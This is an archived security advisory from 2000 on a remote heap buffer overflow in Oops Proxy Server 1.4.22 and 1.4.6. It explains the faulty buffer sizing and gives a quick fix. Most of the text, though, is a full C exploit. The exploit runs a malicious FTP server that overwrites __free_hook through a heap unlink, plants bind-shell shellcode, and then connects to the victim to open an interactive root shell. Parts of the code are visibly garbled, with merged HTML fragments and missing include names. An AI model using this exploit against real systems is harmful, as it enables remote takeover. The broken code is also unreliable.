[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Remote heap buffer overflow in Oops Proxy Server 1.4.22 and 1.4.6

Title: Remote heap buffer overflow in Oops Proxy Server 1.4.22 and 1.4.6
Released by: pkcrew.org
Date: 11th December 2000
Printable version: Click here
pkc001.txt



--- Packet Knights Advisory 001 ---



http://www.pkcrew.org



Author : |CyRaX| 



Application : Oops proxy server 1.4.22 1.4.6 and maybe prior



Type: heap buffer overflow



--- The problem ---



Function list_parser in ftp_utils.c :



line is the line sent by the ftp server in result of a list command



   tempbuf = xmalloc(strlen(line)*3 + strlen(myhostname) + dovesok , [...]);

p is the line without the filename



    htmlized_something = html_escaping(p);



and this is the vulnerable sprintf



sprintf(tempbuf, "http://%s:%s/%s/%s\" alt=\"%s\">%s ",

                              icons_host[0]?icons_host:myhostname,

                              icons_port[0]?icons_port:"80",

                              icons_path[0]?icons_path:"icons",

                              icons[type],

                              alts[type],

                              htmlized_something);



well.. as you can see tempbuf allocs strlen(line)*3. The probably tougth

that the htmlizing of the line can give just a string 3 times bigger than

the line. But if you look at html_escaping code you see that he translates

" into " . So putting a large amount of " in the line we can overflow

tempbuf.



--- The Solution ---



Well.. a quick fix could be just changing the alloc line into:



tempbuf=xmalloc(strlen(line)*6+strlen(myhostname)+dovesok, [..];



but you can save more memory allocating tempbuf after the html_escaping.

Anyway.. the authors were contacted and they're fixing it in a better way.



--- How to exploit this ---



As demostrated by the traceroute and slocate exploits, it's possibile to

overwrite a function pointer modifing a malloc chunk.

And in this case, after the tempbuf buffer, there is the chunk of

htmlized_something. So the exploit have to overwrite it, set the the size to

0xffffffff to make it a free chunk, put the address of the shellcode into fd

and the address of the target function pointer into bd (-8), and when the

free() will call the unlink it will put the shellcode address into

__free_hook. The problem of the exploit is that we must compute exactly the

length of tempbuf and hope that malloc will not give it a bigger length,

overwrite perfectly the chunk, know exactly the address of __free_hook and the

address of the shellcode.

As you can see the bigger problem is the shellcode. We can't simply put a

(not too) large amount of nop, cause the unlink will fill the zone near the

one pointed by __free_hook with the address of it.. (so.. some illegal

instrunctions) and the shellcode have to jump them. If instead you point to a

nop the other nops after that will be overwritten by the unlink() and will

result in SIGILL.

So.. this is very hard to exploit.. anyway it's possible..

I include an example exploit that worked on my slackware 7.0



--- PKCoops-ex.c ---



/* Dimostrative Exploit Against Oops Proxy Server v 1.4.22 and prior

 * Coded by |CyRaX| 

 * Packet Knights Crew : www.pkcrew.org

 * Tested on Slackware 7.0

 *

 * Greetz : all the bros of pkc, expecially recidjvo,asynchro & cthulhu

 * LordFelix & bikappa : for some hints about heap overflow

 * BlackBerry , Nobody88, sMAV, Mav, Mr^Moon and all the others

*/





#include 

#include 

#include 

#include 



#define ALIGN 0

#define __FREE_HOOK 0x40175994

#define SHELLCODE 0x80b1223





char c0de[]="\xeb\x0b\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

            "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"

            "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"

            "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"

            "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"

            "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"

            "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"

            "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"

            "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";





int main(int argc,char **argv){

   int s,s2,clnsock,i;

   struct sockaddr_in srv,clt;

   char buff[500],sndbuff[1500],magic[1000],magic2[50],magic3[5000];

   unsigned long ip;

   int h1,h2,h3,h4,p1,p2;

   u_short port;

   int passive=0,tmplen,wrtlen;

   struct malloc_chunk{

      unsigned int ps;

      unsigned int sz;

      struct malloc_chunk *fd;

      struct malloc_chunk *bd;

   }mc;

   fd_set setz;



   mc.ps=0xffffffff & ~1;

   mc.sz=0xffffffff;

   mc.fd=(struct malloc_chunk *)(SHELLCODE); /* shellcode pointer */

   mc.bd=(struct malloc_chunk *)(__FREE_HOOK-8); /* target pointer */

   memset(magic2,0x41,0);

   memcpy(magic2+0,&mc,sizeof(mc));



   memset(magic3,'\x90',50);

   memcpy(magic3+50,c0de,strlen(c0de));

   magic3[50+strlen(c0de)]=0;



   if(argc<4){

      printf("Proof exploit against oops proxy server heap buffer overflow!\n");

      printf("by |CyRaX| \n");

      printf("Member Of Packet Knights Crew - http://www.pkcrew.org\n");

      printf("Usage ./oopsexp   \n");

      printf("your ip: it is necessary for the passive mode\n");

      printf("hostname len is the len of the host that he *thinks* to have\n");

      printf("         for example if the hostname is c500 you must put 4 here\n");



      exit(0);

   }

   printf("now set the victim as your proxy in any web browser and go to\n");

   printf("http://\n");



   for(i=0;i"" target="_new">http://:80/icons/unknown.gif\">"

       "alt=\"[Unkn] \" ")+atoi(argv[3]);

wrtlen=wrtlen+strlen("Arwxrwxrwx rooOOOt   \r\n")+strlen(magic2);

i=0;



while((wrtlen-tmplen)<16){

       magic[i]='"';

       tmplen+=3; /* 1 *3 */

       wrtlen+=6; /* " */

       i++;

}

magic[i]=0;

printf("ora tmplen %i | wrtlen %i\n",tmplen,wrtlen);





memset(sndbuff,0,1500);

snprintf(sndbuff,6000,"Arwxrwxrwx rooOOOt %s %s 2000 %s\r\n",

  magic,

  magic2,

  magic3);



send(s2,sndbuff,3000,0);

strcpy(sndbuff,"226 Ho finito\r\n");

send(clnsock,sndbuff,strlen(sndbuff),0);

shutdown(s2,2);

printf("closed!\n");

sleep(5);

s2=socket(AF_INET,SOCK_STREAM,0);

clt.sin_addr.s_addr=inet_addr(argv[2]);

clt.sin_port=htons(3879);

clt.sin_family=AF_INET;

if(connect(s2,(struct sockaddr *)&clt,sizeof(clt))!=0){

    printf("SORRY.. it didn't work!\n");

    exit(0);

}

strcpy(sndbuff,"uname -a;id\n");

send(s2,sndbuff,strlen(sndbuff),0);

while(1){

    FD_ZERO(&setz);

    FD_SET(0,&setz);

    FD_SET(s2,&setz);

    select(s2+1,&setz,NULL,NULL,NULL);

    if(FD_ISSET(0,&setz)){

       memset(sndbuff,0,sizeof(sndbuff));

       fgets(sndbuff,sizeof(sndbuff),stdin);

       send(s2,sndbuff,strlen(sndbuff),0);

    }

    if(FD_ISSET(s2,&setz)){

       memset(sndbuff,0,sizeof(sndbuff));

       recv(s2,sndbuff,sizeof(sndbuff),0);

       printf("%s",sndbuff);

    }

}

      }

      if(strstr(buff,"CWD")){

strcpy(sndbuff,"250 SUUU.. FATTI SOTTO !\r\n");

send(clnsock,sndbuff,strlen(sndbuff),0);

      }

      if(strstr(buff,"PWD")){

strcpy(sndbuff,"257 \"/\" ti stai cagando sotto eh ?!\r\n");

send(clnsock,sndbuff,strlen(sndbuff),0);

      }

      if(strstr(buff,"QUIT")){

close(clnsock);

      }

   }

   close(clnsock);

   close(s);

   close(s2);

}





-- EOF --



|CyRaX|

Member Of Packet Knights Crew

www.pkcrew.org








(C) 1999-2000 All rights reserved.